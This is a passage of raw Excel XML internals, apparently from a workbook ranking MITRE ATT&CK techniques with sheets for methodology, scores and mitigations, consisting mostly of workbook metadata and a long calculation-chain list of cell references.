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defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/arobbins/Dev/top-attack-techniques/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7399A498-B6E0-614E-92AE-DE39D7EB1EDC}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-38400" yWindow="-400" windowWidth="30240" windowHeight="17900" activeTab="6" xr2:uid="{9F06889A-6C7C-C544-8850-DA0B62593116}"/>
  </bookViews>
  <sheets>
    <sheet name="TOP 10 TECHNIQUES" sheetId="4" r:id="rId1"/>
    <sheet name="Methodology" sheetId="1" r:id="rId2"/>
    <sheet name="Score" sheetId="2" r:id="rId3"/>
    <sheet name="techniques" sheetId="3" r:id="rId4"/>
    <sheet name="parameters" sheetId="5" r:id="rId5"/>
    <sheet name="Current Version of ATT&amp;CK" sheetId="6" r:id="rId6"/>
    <sheet name="mitigations" sheetId="8" r:id="rId7"/>
    <sheet name="relationships" sheetId="7" r:id="rId8"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">techniques!$A$1:$T$567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M641" i="1" l="1" a="1"/>
  <c r="AM641" i="1" s="1"/>
  <c r="AK641" i="1" a="1"/>
  <c r="AK641" i="1" s="1"/>
  <c r="AI641" i="1" a="1"/>
  <c r="AI641" i="1" s="1"/>
  <c r="AG641" i="1" a="1"/>
  <c r="AG641" i="1" s="1"/>
  <c r="AE641" i="1" a="1"/>
  <c r="AE641" i="1" s="1"/>
  <c r="AM640" i="1" a="1"/>
  <c r="AM640" i="1" s="1"/>
  <c r="AK640" i="1" a="1"/>
  <c r="AK640" i="1"/>
  <c r="AI640" i="1" a="1"/>
  <c r="AI640" i="1"/>
  <c r="AG640" i="1" a="1"/>
  <c r="AG640" i="1" s="1"/>
  <c r="AE640" i="1" a="1"/>
  <c r="AE640" i="1" s="1"/>
  <c r="AM639" i="1" a="1"/>
  <c r="AM639" i="1" s="1"/>
  <c r="AK639" i="1" a="1"/>
  <c r="AK639" i="1" s="1"/>
  <c r="AI639" i="1" a="1"/>
  <c r="AI639" i="1"/>
  <c r="AG639" i="1" a="1"/>
  <c r="AG639" i="1" s="1"/>
  <c r="AE639" i="1" a="1"/>
  <c r="AE639" i="1" s="1"/>
  <c r="AM638" i="1" a="1"/>
  <c r="AM638" i="1" s="1"/>
  <c r="AK638" i="1" a="1"/>
  <c r="AK638" i="1" s="1"/>
  <c r="AI638" i="1" a="1"/>
  <c r="AI638" i="1"/>
  <c r="AG638" i="1" a="1"/>
  <c r="AG638" i="1"/>
  <c r="AE638" i="1" a="1"/>
  <c r="AE638" i="1" s="1"/>
  <c r="AM637" i="1" a="1"/>
  <c r="AM637" i="1" s="1"/>
  <c r="AK637" i="1" a="1"/>
  <c r="AK637" i="1" s="1"/>
  <c r="AI637" i="1" a="1"/>
  <c r="AI637" i="1" s="1"/>
  <c r="AG637" i="1" a="1"/>
  <c r="AG637" i="1"/>
  <c r="AE637" i="1" a="1"/>
  <c r="AE637" i="1" s="1"/>
  <c r="AM636" i="1" a="1"/>
  <c r="AM636" i="1" s="1"/>
  <c r="AK636" i="1" a="1"/>
  <c r="AK636" i="1" s="1"/>
  <c r="AI636" i="1" a="1"/>
  <c r="AI636" i="1" s="1"/>
  <c r="AG636" i="1" a="1"/>
  <c r="AG636" i="1" s="1"/>
  <c r="AE636" i="1" a="1"/>
  <c r="AE636" i="1"/>
  <c r="AM635" i="1" a="1"/>
  <c r="AM635" i="1" s="1"/>
  <c r="AK635" i="1" a="1"/>
  <c r="AK635" i="1" s="1"/>
  <c r="AI635" i="1" a="1"/>
  <c r="AI635" i="1"/>
  <c r="AG635" i="1" a="1"/>
  <c r="AG635" i="1" s="1"/>
  <c r="AE635" i="1" a="1"/>
  <c r="AE635" i="1"/>
  <c r="AM634" i="1" a="1"/>
  <c r="AM634" i="1" s="1"/>
  <c r="AK634" i="1" a="1"/>
  <c r="AK634" i="1"/>
  <c r="AI634" i="1" a="1"/>
  <c r="AI634" i="1" s="1"/>
  <c r="AG634" i="1" a="1"/>
  <c r="AG634" i="1" s="1"/>
  <c r="AE634" i="1" a="1"/>
  <c r="AE634" i="1"/>
  <c r="AM633" i="1" a="1"/>
  <c r="AM633" i="1" s="1"/>
  <c r="AK633" i="1" a="1"/>
  <c r="AK633" i="1" s="1"/>
  <c r="AI633" i="1" a="1"/>
  <c r="AI633" i="1" s="1"/>
  <c r="AG633" i="1" a="1"/>
  <c r="AG633" i="1" s="1"/>
  <c r="AE633" i="1" a="1"/>
  <c r="AE633" i="1" s="1"/>
  <c r="AM632" i="1" a="1"/>
  <c r="AM632" i="1" s="1"/>
  <c r="AK632" i="1" a="1"/>
  <c r="AK632" i="1"/>
  <c r="AI632" i="1" a="1"/>
  <c r="AI632" i="1"/>
  <c r="AG632" i="1" a="1"/>
  <c r="AG632" i="1" s="1"/>
  <c r="AE632" i="1" a="1"/>
  <c r="AE632" i="1"/>
  <c r="AM631" i="1" a="1"/>
  <c r="AM631" i="1" s="1"/>
  <c r="AK631" i="1" a="1"/>
  <c r="AK631" i="1"/>
  <c r="AI631" i="1" a="1"/>
  <c r="AI631" i="1" s="1"/>
  <c r="AG631" i="1" a="1"/>
  <c r="AG631" i="1" s="1"/>
  <c r="AE631" i="1" a="1"/>
  <c r="AE631" i="1" s="1"/>
  <c r="AM630" i="1" a="1"/>
  <c r="AM630" i="1" s="1"/>
  <c r="AK630" i="1" a="1"/>
  <c r="AK630" i="1"/>
  <c r="AI630" i="1" a="1"/>
  <c r="AI630" i="1"/>
  <c r="AG630" i="1" a="1"/>
  <c r="AG630" i="1"/>
  <c r="AE630" i="1" a="1"/>
  <c r="AE630" i="1" s="1"/>
  <c r="AM629" i="1" a="1"/>
  <c r="AM629" i="1" s="1"/>
  <c r="AK629" i="1" a="1"/>
  <c r="AK629" i="1" s="1"/>
  <c r="AI629" i="1" a="1"/>
  <c r="AI629" i="1"/>
  <c r="AG629" i="1" a="1"/>
  <c r="AG629" i="1" s="1"/>
  <c r="AE629" i="1" a="1"/>
  <c r="AE629" i="1" s="1"/>
  <c r="AM628" i="1" a="1"/>
  <c r="AM628" i="1" s="1"/>
  <c r="AK628" i="1" a="1"/>
  <c r="AK628" i="1"/>
  <c r="AI628" i="1" a="1"/>
  <c r="AI628" i="1"/>
  <c r="AG628" i="1" a="1"/>
  <c r="AG628" i="1"/>
  <c r="AE628" i="1" a="1"/>
  <c r="AE628" i="1"/>
  <c r="AM627" i="1" a="1"/>
  <c r="AM627" i="1" s="1"/>
  <c r="AK627" i="1" a="1"/>
  <c r="AK627" i="1" s="1"/>
  <c r="AI627" i="1" a="1"/>
  <c r="AI627" i="1" s="1"/>
  <c r="AG627" i="1" a="1"/>
  <c r="AG627" i="1"/>
  <c r="AE627" i="1" a="1"/>
  <c r="AE627" i="1" s="1"/>
  <c r="AM626" i="1" a="1"/>
  <c r="AM626" i="1" s="1"/>
  <c r="AK626" i="1" a="1"/>
  <c r="AK626" i="1" s="1"/>
  <c r="AI626" i="1" a="1"/>
  <c r="AI626" i="1"/>
  <c r="AG626" i="1" a="1"/>
  <c r="AG626" i="1"/>
  <c r="AE626" i="1" a="1"/>
  <c r="AE626" i="1"/>
  <c r="AM625" i="1" a="1"/>
  <c r="AM625" i="1" s="1"/>
  <c r="AK625" i="1" a="1"/>
  <c r="AK625" i="1" s="1"/>
  <c r="AI625" i="1" a="1"/>
  <c r="AI625" i="1" s="1"/>
  <c r="AG625" i="1" a="1"/>
  <c r="AG625" i="1" s="1"/>
  <c r="AE625" i="1" a="1"/>
  <c r="AE625" i="1"/>
  <c r="AM624" i="1" a="1"/>
  <c r="AM624" i="1" s="1"/>
  <c r="AK624" i="1" a="1"/>
  <c r="AK624" i="1"/>
  <c r="AI624" i="1" a="1"/>
  <c r="AI624" i="1" s="1"/>
  <c r="AG624" i="1" a="1"/>
  <c r="AG624" i="1"/>
  <c r="AE624" i="1" a="1"/>
  <c r="AE624" i="1"/>
  <c r="AM623" i="1" a="1"/>
  <c r="AM623" i="1" s="1"/>
  <c r="AK623" i="1" a="1"/>
  <c r="AK623" i="1" s="1"/>
  <c r="AI623" i="1" a="1"/>
  <c r="AI623" i="1" s="1"/>
  <c r="AG623" i="1" a="1"/>
  <c r="AG623" i="1" s="1"/>
  <c r="AE623" i="1" a="1"/>
  <c r="AE623" i="1" s="1"/>
  <c r="AM622" i="1" a="1"/>
  <c r="AM622" i="1" s="1"/>
  <c r="AK622" i="1" a="1"/>
  <c r="AK622" i="1"/>
  <c r="AI622" i="1" a="1"/>
  <c r="AI622" i="1"/>
  <c r="AG622" i="1" a="1"/>
  <c r="AG622" i="1" s="1"/>
  <c r="AE622" i="1" a="1"/>
  <c r="AE622" i="1" s="1"/>
  <c r="AM621" i="1" a="1"/>
  <c r="AM621" i="1" s="1"/>
  <c r="AK621" i="1" a="1"/>
  <c r="AK621" i="1"/>
  <c r="AI621" i="1" a="1"/>
  <c r="AI621" i="1" s="1"/>
  <c r="AG621" i="1" a="1"/>
  <c r="AG621" i="1" s="1"/>
  <c r="AE621" i="1" a="1"/>
  <c r="AE621" i="1" s="1"/>
  <c r="AM620" i="1" a="1"/>
  <c r="AM620" i="1" s="1"/>
  <c r="AK620" i="1" a="1"/>
  <c r="AK620" i="1"/>
  <c r="AI620" i="1" a="1"/>
  <c r="AI620" i="1"/>
  <c r="AG620" i="1" a="1"/>
  <c r="AG620" i="1"/>
  <c r="AE620" i="1" a="1"/>
  <c r="AE620" i="1" s="1"/>
  <c r="AM619" i="1" a="1"/>
  <c r="AM619" i="1" s="1"/>
  <c r="AK619" i="1" a="1"/>
  <c r="AK619" i="1" s="1"/>
  <c r="AI619" i="1" a="1"/>
  <c r="AI619" i="1"/>
  <c r="AG619" i="1" a="1"/>
  <c r="AG619" i="1" s="1"/>
  <c r="AE619" i="1" a="1"/>
  <c r="AE619" i="1" s="1"/>
  <c r="AM618" i="1" a="1"/>
  <c r="AM618" i="1" s="1"/>
  <c r="AK618" i="1" a="1"/>
  <c r="AK618" i="1"/>
  <c r="AI618" i="1" a="1"/>
  <c r="AI618" i="1"/>
  <c r="AG618" i="1" a="1"/>
  <c r="AG618" i="1"/>
  <c r="AE618" i="1" a="1"/>
  <c r="AE618" i="1"/>
  <c r="AM617" i="1" a="1"/>
  <c r="AM617" i="1" s="1"/>
  <c r="AK617" i="1" a="1"/>
  <c r="AK617" i="1"/>
  <c r="AI617" i="1" a="1"/>
  <c r="AI617" i="1" s="1"/>
  <c r="AG617" i="1" a="1"/>
  <c r="AG617" i="1"/>
  <c r="AE617" i="1" a="1"/>
  <c r="AE617" i="1" s="1"/>
  <c r="AM616" i="1" a="1"/>
  <c r="AM616" i="1" s="1"/>
  <c r="AK616" i="1" a="1"/>
  <c r="AK616" i="1" s="1"/>
  <c r="AI616" i="1" a="1"/>
  <c r="AI616" i="1"/>
  <c r="AG616" i="1" a="1"/>
  <c r="AG616" i="1"/>
  <c r="AE616" i="1" a="1"/>
  <c r="AE616" i="1"/>
  <c r="AM615" i="1" a="1"/>
  <c r="AM615" i="1" s="1"/>
  <c r="AK615" i="1" a="1"/>
  <c r="AK615" i="1" s="1"/>
  <c r="AI615" i="1" a="1"/>
  <c r="AI615" i="1"/>
  <c r="AG615" i="1" a="1"/>
  <c r="AG615" i="1" s="1"/>
  <c r="AE615" i="1" a="1"/>
  <c r="AE615" i="1"/>
  <c r="AM614" i="1" a="1"/>
  <c r="AM614" i="1" s="1"/>
  <c r="AK614" i="1" a="1"/>
  <c r="AK614" i="1"/>
  <c r="AI614" i="1" a="1"/>
  <c r="AI614" i="1" s="1"/>
  <c r="AG614" i="1" a="1"/>
  <c r="AG614" i="1"/>
  <c r="AE614" i="1" a="1"/>
  <c r="AE614" i="1"/>
  <c r="AM613" i="1" a="1"/>
  <c r="AM613" i="1" s="1"/>
  <c r="AK613" i="1" a="1"/>
  <c r="AK613" i="1" s="1"/>
  <c r="AI613" i="1" a="1"/>
  <c r="AI613" i="1" s="1"/>
  <c r="AG613" i="1" a="1"/>
  <c r="AG613" i="1"/>
  <c r="AE613" i="1" a="1"/>
  <c r="AE613" i="1" s="1"/>
  <c r="AM612" i="1" a="1"/>
  <c r="AM612" i="1" s="1"/>
  <c r="AK612" i="1" a="1"/>
  <c r="AK612" i="1"/>
  <c r="AI612" i="1" a="1"/>
  <c r="AI612" i="1"/>
  <c r="AG612" i="1" a="1"/>
  <c r="AG612" i="1" s="1"/>
  <c r="AE612" i="1" a="1"/>
  <c r="AE612" i="1"/>
  <c r="AM611" i="1" a="1"/>
  <c r="AM611" i="1" s="1"/>
  <c r="AK611" i="1" a="1"/>
  <c r="AK611" i="1"/>
  <c r="AI611" i="1" a="1"/>
  <c r="AI611" i="1" s="1"/>
  <c r="AG611" i="1" a="1"/>
  <c r="AG611" i="1" s="1"/>
  <c r="AE611" i="1" a="1"/>
  <c r="AE611" i="1"/>
  <c r="AM610" i="1" a="1"/>
  <c r="AM610" i="1" s="1"/>
  <c r="AK610" i="1" a="1"/>
  <c r="AK610" i="1" s="1"/>
  <c r="AI610" i="1" a="1"/>
  <c r="AI610" i="1"/>
  <c r="AG610" i="1" a="1"/>
  <c r="AG610" i="1"/>
  <c r="AE610" i="1" a="1"/>
  <c r="AE610" i="1" s="1"/>
  <c r="AM609" i="1" a="1"/>
  <c r="AM609" i="1" s="1"/>
  <c r="AK609" i="1" a="1"/>
  <c r="AK609" i="1" s="1"/>
  <c r="AI609" i="1" a="1"/>
  <c r="AI609" i="1"/>
  <c r="AG609" i="1" a="1"/>
  <c r="AG609" i="1" s="1"/>
  <c r="AE609" i="1" a="1"/>
  <c r="AE609" i="1" s="1"/>
  <c r="AM608" i="1" a="1"/>
  <c r="AM608" i="1" s="1"/>
  <c r="AK608" i="1" a="1"/>
  <c r="AK608" i="1"/>
  <c r="AI608" i="1" a="1"/>
  <c r="AI608" i="1" s="1"/>
  <c r="AG608" i="1" a="1"/>
  <c r="AG608" i="1"/>
  <c r="AE608" i="1" a="1"/>
  <c r="AE608" i="1"/>
  <c r="AM607" i="1" a="1"/>
  <c r="AM607" i="1" s="1"/>
  <c r="AK607" i="1" a="1"/>
  <c r="AK607" i="1"/>
  <c r="AI607" i="1" a="1"/>
  <c r="AI607" i="1" s="1"/>
  <c r="AG607" i="1" a="1"/>
  <c r="AG607" i="1"/>
  <c r="AE607" i="1" a="1"/>
  <c r="AE607" i="1" s="1"/>
  <c r="AM606" i="1" a="1"/>
  <c r="AM606" i="1" s="1"/>
  <c r="AK606" i="1" a="1"/>
  <c r="AK606" i="1" s="1"/>
  <c r="AI606" i="1" a="1"/>
  <c r="AI606" i="1"/>
  <c r="AG606" i="1" a="1"/>
  <c r="AG606" i="1" s="1"/>
  <c r="AE606" i="1" a="1"/>
  <c r="AE606" i="1"/>
  <c r="AM605" i="1" a="1"/>
  <c r="AM605" i="1" s="1"/>
  <c r="AK605" i="1" a="1"/>
  <c r="AK605" i="1" s="1"/>
  <c r="AI605" i="1" a="1"/>
  <c r="AI605" i="1"/>
  <c r="AG605" i="1" a="1"/>
  <c r="AG605" i="1" s="1"/>
  <c r="AE605" i="1" a="1"/>
  <c r="AE605" i="1"/>
  <c r="AM604" i="1" a="1"/>
  <c r="AM604" i="1" s="1"/>
  <c r="AK604" i="1" a="1"/>
  <c r="AK604" i="1"/>
  <c r="AI604" i="1" a="1"/>
  <c r="AI604" i="1" s="1"/>
  <c r="AG604" i="1" a="1"/>
  <c r="AG604" i="1"/>
  <c r="AE604" i="1" a="1"/>
  <c r="AE604" i="1"/>
  <c r="AM603" i="1" a="1"/>
  <c r="AM603" i="1" s="1"/>
  <c r="AK603" i="1" a="1"/>
  <c r="AK603" i="1" s="1"/>
  <c r="AI603" i="1" a="1"/>
  <c r="AI603" i="1" s="1"/>
  <c r="AG603" i="1" a="1"/>
  <c r="AG603" i="1"/>
  <c r="AE603" i="1" a="1"/>
  <c r="AE603" i="1" s="1"/>
  <c r="AM602" i="1" a="1"/>
  <c r="AM602" i="1" s="1"/>
  <c r="AK602" i="1" a="1"/>
  <c r="AK602" i="1"/>
  <c r="AI602" i="1" a="1"/>
  <c r="AI602" i="1"/>
  <c r="AG602" i="1" a="1"/>
  <c r="AG602" i="1" s="1"/>
  <c r="AE602" i="1" a="1"/>
  <c r="AE602" i="1"/>
  <c r="AM601" i="1" a="1"/>
  <c r="AM601" i="1" s="1"/>
  <c r="AK601" i="1" a="1"/>
  <c r="AK601" i="1"/>
  <c r="AI601" i="1" a="1"/>
  <c r="AI601" i="1" s="1"/>
  <c r="AG601" i="1" a="1"/>
  <c r="AG601" i="1" s="1"/>
  <c r="AE601" i="1" a="1"/>
  <c r="AE601" i="1"/>
  <c r="AM600" i="1" a="1"/>
  <c r="AM600" i="1" s="1"/>
  <c r="AK600" i="1" a="1"/>
  <c r="AK600" i="1"/>
  <c r="AI600" i="1" a="1"/>
  <c r="AI600" i="1"/>
  <c r="AG600" i="1" a="1"/>
  <c r="AG600" i="1"/>
  <c r="AE600" i="1" a="1"/>
  <c r="AE600" i="1" s="1"/>
  <c r="AM599" i="1" a="1"/>
  <c r="AM599" i="1" s="1"/>
  <c r="AK599" i="1" a="1"/>
  <c r="AK599" i="1" s="1"/>
  <c r="AI599" i="1" a="1"/>
  <c r="AI599" i="1"/>
  <c r="AG599" i="1" a="1"/>
  <c r="AG599" i="1" s="1"/>
  <c r="AE599" i="1" a="1"/>
  <c r="AE599" i="1" s="1"/>
  <c r="AM598" i="1" a="1"/>
  <c r="AM598" i="1" s="1"/>
  <c r="AK598" i="1" a="1"/>
  <c r="AK598" i="1"/>
  <c r="AI598" i="1" a="1"/>
  <c r="AI598" i="1" s="1"/>
  <c r="AG598" i="1" a="1"/>
  <c r="AG598" i="1"/>
  <c r="AE598" i="1" a="1"/>
  <c r="AE598" i="1"/>
  <c r="AM597" i="1" a="1"/>
  <c r="AM597" i="1" s="1"/>
  <c r="AK597" i="1" a="1"/>
  <c r="AK597" i="1"/>
  <c r="AI597" i="1" a="1"/>
  <c r="AI597" i="1" s="1"/>
  <c r="AG597" i="1" a="1"/>
  <c r="AG597" i="1"/>
  <c r="AE597" i="1" a="1"/>
  <c r="AE597" i="1" s="1"/>
  <c r="AM596" i="1" a="1"/>
  <c r="AM596" i="1" s="1"/>
  <c r="AK596" i="1" a="1"/>
  <c r="AK596" i="1" s="1"/>
  <c r="AI596" i="1" a="1"/>
  <c r="AI596" i="1"/>
  <c r="AG596" i="1" a="1"/>
  <c r="AG596" i="1" s="1"/>
  <c r="AE596" i="1" a="1"/>
  <c r="AE596" i="1"/>
  <c r="AM595" i="1" a="1"/>
  <c r="AM595" i="1" s="1"/>
  <c r="AK595" i="1" a="1"/>
  <c r="AK595" i="1"/>
  <c r="AI595" i="1" a="1"/>
  <c r="AI595" i="1" s="1"/>
  <c r="AG595" i="1" a="1"/>
  <c r="AG595" i="1" s="1"/>
  <c r="AE595" i="1" a="1"/>
  <c r="AE595" i="1"/>
  <c r="AM594" i="1" a="1"/>
  <c r="AM594" i="1" s="1"/>
  <c r="AK594" i="1" a="1"/>
  <c r="AK594" i="1" s="1"/>
  <c r="AI594" i="1" a="1"/>
  <c r="AI594" i="1" s="1"/>
  <c r="AG594" i="1" a="1"/>
  <c r="AG594" i="1"/>
  <c r="AE594" i="1" a="1"/>
  <c r="AE594" i="1" s="1"/>
  <c r="AM593" i="1" a="1"/>
  <c r="AM593" i="1" s="1"/>
  <c r="AK593" i="1" a="1"/>
  <c r="AK593" i="1" s="1"/>
  <c r="AI593" i="1" a="1"/>
  <c r="AI593" i="1" s="1"/>
  <c r="AG593" i="1" a="1"/>
  <c r="AG593" i="1" s="1"/>
  <c r="AE593" i="1" a="1"/>
  <c r="AE593" i="1" s="1"/>
  <c r="AM592" i="1" a="1"/>
  <c r="AM592" i="1" s="1"/>
  <c r="AK592" i="1" a="1"/>
  <c r="AK592" i="1"/>
  <c r="AI592" i="1" a="1"/>
  <c r="AI592" i="1" s="1"/>
  <c r="AG592" i="1" a="1"/>
  <c r="AG592" i="1" s="1"/>
  <c r="AE592" i="1" a="1"/>
  <c r="AE592" i="1"/>
  <c r="AM591" i="1" a="1"/>
  <c r="AM591" i="1" s="1"/>
  <c r="AK591" i="1" a="1"/>
  <c r="AK591" i="1"/>
  <c r="AI591" i="1" a="1"/>
  <c r="AI591" i="1" s="1"/>
  <c r="AG591" i="1" a="1"/>
  <c r="AG591" i="1" s="1"/>
  <c r="AE591" i="1" a="1"/>
  <c r="AE591" i="1"/>
  <c r="AM590" i="1" a="1"/>
  <c r="AM590" i="1" s="1"/>
  <c r="AK590" i="1" a="1"/>
  <c r="AK590" i="1"/>
  <c r="AI590" i="1" a="1"/>
  <c r="AI590" i="1"/>
  <c r="AG590" i="1" a="1"/>
  <c r="AG590" i="1"/>
  <c r="AE590" i="1" a="1"/>
  <c r="AE590" i="1" s="1"/>
  <c r="AM589" i="1" a="1"/>
  <c r="AM589" i="1" s="1"/>
  <c r="AK589" i="1" a="1"/>
  <c r="AK589" i="1" s="1"/>
  <c r="AI589" i="1" a="1"/>
  <c r="AI589" i="1"/>
  <c r="AG589" i="1" a="1"/>
  <c r="AG589" i="1"/>
  <c r="AE589" i="1" a="1"/>
  <c r="AE589" i="1" s="1"/>
  <c r="AM588" i="1" a="1"/>
  <c r="AM588" i="1" s="1"/>
  <c r="AK588" i="1" a="1"/>
  <c r="AK588" i="1"/>
  <c r="AI588" i="1" a="1"/>
  <c r="AI588" i="1"/>
  <c r="AG588" i="1" a="1"/>
  <c r="AG588" i="1"/>
  <c r="AE588" i="1" a="1"/>
  <c r="AE588" i="1"/>
  <c r="AM587" i="1" a="1"/>
  <c r="AM587" i="1" s="1"/>
  <c r="AK587" i="1" a="1"/>
  <c r="AK587" i="1"/>
  <c r="AI587" i="1" a="1"/>
  <c r="AI587" i="1" s="1"/>
  <c r="AG587" i="1" a="1"/>
  <c r="AG587" i="1"/>
  <c r="AE587" i="1" a="1"/>
  <c r="AE587" i="1"/>
  <c r="AM586" i="1" a="1"/>
  <c r="AM586" i="1" s="1"/>
  <c r="AK586" i="1" a="1"/>
  <c r="AK586" i="1" s="1"/>
  <c r="AI586" i="1" a="1"/>
  <c r="AI586" i="1"/>
  <c r="AG586" i="1" a="1"/>
  <c r="AG586" i="1"/>
  <c r="AE586" i="1" a="1"/>
  <c r="AE586" i="1" s="1"/>
  <c r="AM585" i="1" a="1"/>
  <c r="AM585" i="1" s="1"/>
  <c r="AK585" i="1" a="1"/>
  <c r="AK585" i="1"/>
  <c r="AI585" i="1" a="1"/>
  <c r="AI585" i="1"/>
  <c r="AG585" i="1" a="1"/>
  <c r="AG585" i="1" s="1"/>
  <c r="AE585" i="1" a="1"/>
  <c r="AE585" i="1"/>
  <c r="AM584" i="1" a="1"/>
  <c r="AM584" i="1" s="1"/>
  <c r="AK584" i="1" a="1"/>
  <c r="AK584" i="1" s="1"/>
  <c r="AI584" i="1" a="1"/>
  <c r="AI584" i="1" s="1"/>
  <c r="AG584" i="1" a="1"/>
  <c r="AG584" i="1"/>
  <c r="AE584" i="1" a="1"/>
  <c r="AE584" i="1"/>
  <c r="AM583" i="1" a="1"/>
  <c r="AM583" i="1" s="1"/>
  <c r="AK583" i="1" a="1"/>
  <c r="AK583" i="1" s="1"/>
  <c r="AI583" i="1" a="1"/>
  <c r="AI583" i="1" s="1"/>
  <c r="AG583" i="1" a="1"/>
  <c r="AG583" i="1"/>
  <c r="AE583" i="1" a="1"/>
  <c r="AE583" i="1" s="1"/>
  <c r="AM582" i="1" a="1"/>
  <c r="AM582" i="1" s="1"/>
  <c r="AK582" i="1" a="1"/>
  <c r="AK582" i="1" s="1"/>
  <c r="AI582" i="1" a="1"/>
  <c r="AI582" i="1" s="1"/>
  <c r="AG582" i="1" a="1"/>
  <c r="AG582" i="1" s="1"/>
  <c r="AE582" i="1" a="1"/>
  <c r="AE582" i="1"/>
  <c r="AM581" i="1" a="1"/>
  <c r="AM581" i="1" s="1"/>
  <c r="AK581" i="1" a="1"/>
  <c r="AK581" i="1"/>
  <c r="AI581" i="1" a="1"/>
  <c r="AI581" i="1" s="1"/>
  <c r="AG581" i="1" a="1"/>
  <c r="AG581" i="1" s="1"/>
  <c r="AE581" i="1" a="1"/>
  <c r="AE581" i="1"/>
  <c r="AM580" i="1" a="1"/>
  <c r="AM580" i="1" s="1"/>
  <c r="AK580" i="1" a="1"/>
  <c r="AK580" i="1"/>
  <c r="AI580" i="1" a="1"/>
  <c r="AI580" i="1"/>
  <c r="AG580" i="1" a="1"/>
  <c r="AG580" i="1"/>
  <c r="AE580" i="1" a="1"/>
  <c r="AE580" i="1" s="1"/>
  <c r="AM579" i="1" a="1"/>
  <c r="AM579" i="1" s="1"/>
  <c r="AK579" i="1" a="1"/>
  <c r="AK579" i="1" s="1"/>
  <c r="AI579" i="1" a="1"/>
  <c r="AI579" i="1"/>
  <c r="AG579" i="1" a="1"/>
  <c r="AG579" i="1"/>
  <c r="AE579" i="1" a="1"/>
  <c r="AE579" i="1" s="1"/>
  <c r="AM578" i="1" a="1"/>
  <c r="AM578" i="1" s="1"/>
  <c r="AK578" i="1" a="1"/>
  <c r="AK578" i="1" s="1"/>
  <c r="AI578" i="1" a="1"/>
  <c r="AI578" i="1"/>
  <c r="AG578" i="1" a="1"/>
  <c r="AG578" i="1" s="1"/>
  <c r="AE578" i="1" a="1"/>
  <c r="AE578" i="1" s="1"/>
  <c r="AM577" i="1" a="1"/>
  <c r="AM577" i="1" s="1"/>
  <c r="AK577" i="1" a="1"/>
  <c r="AK577" i="1" s="1"/>
  <c r="AI577" i="1" a="1"/>
  <c r="AI577" i="1" s="1"/>
  <c r="AG577" i="1" a="1"/>
  <c r="AG577" i="1"/>
  <c r="AE577" i="1" a="1"/>
  <c r="AE577" i="1" s="1"/>
  <c r="AM576" i="1" a="1"/>
  <c r="AM576" i="1" s="1"/>
  <c r="AK576" i="1" a="1"/>
  <c r="AK576" i="1" s="1"/>
  <c r="AI576" i="1" a="1"/>
  <c r="AI576" i="1" s="1"/>
  <c r="AG576" i="1" a="1"/>
  <c r="AG576" i="1"/>
  <c r="AE576" i="1" a="1"/>
  <c r="AE576" i="1"/>
  <c r="AM575" i="1" a="1"/>
  <c r="AM575" i="1" s="1"/>
  <c r="AK575" i="1" a="1"/>
  <c r="AK575" i="1" s="1"/>
  <c r="AI575" i="1" a="1"/>
  <c r="AI575" i="1" s="1"/>
  <c r="AG575" i="1" a="1"/>
  <c r="AG575" i="1" s="1"/>
  <c r="AE575" i="1" a="1"/>
  <c r="AE575" i="1"/>
  <c r="AM574" i="1" a="1"/>
  <c r="AM574" i="1" s="1"/>
  <c r="AK574" i="1" a="1"/>
  <c r="AK574" i="1" s="1"/>
  <c r="AI574" i="1" a="1"/>
  <c r="AI574" i="1" s="1"/>
  <c r="AG574" i="1" a="1"/>
  <c r="AG574" i="1" s="1"/>
  <c r="AE574" i="1" a="1"/>
  <c r="AE574" i="1"/>
  <c r="AM573" i="1" a="1"/>
  <c r="AM573" i="1" s="1"/>
  <c r="AK573" i="1" a="1"/>
  <c r="AK573" i="1"/>
  <c r="AI573" i="1" a="1"/>
  <c r="AI573" i="1"/>
  <c r="AG573" i="1" a="1"/>
  <c r="AG573" i="1" s="1"/>
  <c r="AE573" i="1" a="1"/>
  <c r="AE573" i="1" s="1"/>
  <c r="AM572" i="1" a="1"/>
  <c r="AM572" i="1" s="1"/>
  <c r="AK572" i="1" a="1"/>
  <c r="AK572" i="1"/>
  <c r="AI572" i="1" a="1"/>
  <c r="AI572" i="1"/>
  <c r="AG572" i="1" a="1"/>
  <c r="AG572" i="1"/>
  <c r="AE572" i="1" a="1"/>
  <c r="AE572" i="1" s="1"/>
  <c r="AM571" i="1" a="1"/>
  <c r="AM571" i="1" s="1"/>
  <c r="AK571" i="1" a="1"/>
  <c r="AK571" i="1"/>
  <c r="AI571" i="1" a="1"/>
  <c r="AI571" i="1" s="1"/>
  <c r="AG571" i="1" a="1"/>
  <c r="AG571" i="1" s="1"/>
  <c r="AE571" i="1" a="1"/>
  <c r="AE571" i="1" s="1"/>
  <c r="AM570" i="1" a="1"/>
  <c r="AM570" i="1" s="1"/>
  <c r="AK570" i="1" a="1"/>
  <c r="AK570" i="1"/>
  <c r="AI570" i="1" a="1"/>
  <c r="AI570" i="1"/>
  <c r="AG570" i="1" a="1"/>
  <c r="AG570" i="1"/>
  <c r="AE570" i="1" a="1"/>
  <c r="AE570" i="1"/>
  <c r="AM569" i="1" a="1"/>
  <c r="AM569" i="1" s="1"/>
  <c r="AK569" i="1" a="1"/>
  <c r="AK569" i="1" s="1"/>
  <c r="AI569" i="1" a="1"/>
  <c r="AI569" i="1"/>
  <c r="AG569" i="1" a="1"/>
  <c r="AG569" i="1"/>
  <c r="AE569" i="1" a="1"/>
  <c r="AE569" i="1"/>
  <c r="AM568" i="1" a="1"/>
  <c r="AM568" i="1" s="1"/>
  <c r="AK568" i="1" a="1"/>
  <c r="AK568" i="1" s="1"/>
  <c r="AI568" i="1" a="1"/>
  <c r="AI568" i="1"/>
  <c r="AG568" i="1" a="1"/>
  <c r="AG568" i="1" s="1"/>
  <c r="AE568" i="1" a="1"/>
  <c r="AE568" i="1" s="1"/>
  <c r="AM567" i="1" a="1"/>
  <c r="AM567" i="1" s="1"/>
